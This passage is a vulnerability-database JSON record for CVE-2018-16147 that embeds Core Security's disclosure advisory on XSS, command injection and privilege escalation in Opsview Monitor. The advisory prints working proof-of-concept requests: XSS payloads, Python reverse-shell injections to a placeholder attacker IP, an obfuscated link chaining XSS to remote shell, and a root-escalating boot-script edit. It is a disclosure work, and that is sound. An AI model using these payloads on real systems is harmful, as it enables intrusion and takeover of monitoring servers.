"id": "CNNVD-201809-156"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. **Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nIn addition, issues presented in 7.3 and 7.4 could allow an attacker to\nobtain command execution on the system as the nagios user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. \nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. \n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. **Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. \n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. \n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16147",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17454",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16147",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"id": "VAR-201809-0905",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
}
]
},
"last_update_date": "2023-12-18T12:01:17.606000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Cross-Site Scripting Vulnerability (CNVD-2018-17454)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139515"
},
{
"title": "Opsview Monitor Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84508"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
